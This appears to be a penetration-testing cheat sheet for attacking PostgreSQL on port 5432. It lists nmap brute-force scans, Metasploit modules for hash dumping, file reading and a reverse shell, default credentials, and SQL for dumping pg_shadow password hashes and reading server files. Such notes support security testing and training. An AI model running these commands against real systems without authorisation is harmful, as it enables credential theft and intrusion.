5432 - PostgresSQL
PostgreSQL is an open source database which can be found mostly in Linux operating systems.
PostgreSQL is an open source database which can be found mostly in Linux operating systems. However it has great compatibility with multiple operating systems and it can run in Windows and MacOS platforms as well. If the database is not properly configured and credentials have been obtained then it is possible to perform various activities like read and write system files and execution of arbitrary code.
Enumeration
Nmap
Version disclosure
Use nmap -sV -p 5432 10.0.0.1
Bruteforce credentials:
nmap -p 5432 --script pgsql-brute
Metasploit
Version disclosure
auxiliary/scanner/postgres/postgres_version
Bruteforce login:
auxiliary/scanner/postgres/postgres_login
Dump scheme:
auxiliary/scanner/postgres/postgres_schemadump
Database enumeration:
auxiliary/admin/postgres/postgres_sql
Hashdump:
auxiliary/scanner/postgres/postgres_hashdump
Read files:
auxiliary/admin/postgres/postgres_readfile
Reverse shell
exploit/linux/postgres/postgres_payload
Login
Login using psql:
psql -h 192.168.100.11 -U postgres
Common/default credentials
Username
Password
postgres
postgres
postgres
password
postgres
admin
admin
admin
admin
password
Bruteforce login credentials:
Commands
Description
Command
List databases
\l
List databases users
\du
List existing tables
\dt
Connect to a specific database
\c database_name;
Get detailed information on a table
\d+ table_name
Get table content
select * from table_name;
Retrieving database passwords
SELECT * FROM users;
OR select usename, passwd from pg_shadow
Dumping databases content
SELECT usename, passwd FROM pg_shadow; OR
pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump
Create a new database
CREATE DATABASE [IF NOT EXISTS] db_name;
exit the database
\q
Command execution
PostgreSQL databases can interact with the underlying operating by allowing the database administrator to execute various database commands and retrieve output from the system.
Run:
postgres=# select pg_ls_dir('./');
By executing the following command it is possible to read server side postgres files.
postgres=# select pg_read_file('PG_VERSION', 0, 200);
It is also possible to create a database table in order to store and view contents of a file that exist in the host.
OR use the metasploit module
Auxiliary/admin/postgres/postgres_readfile
Execute command
Last updated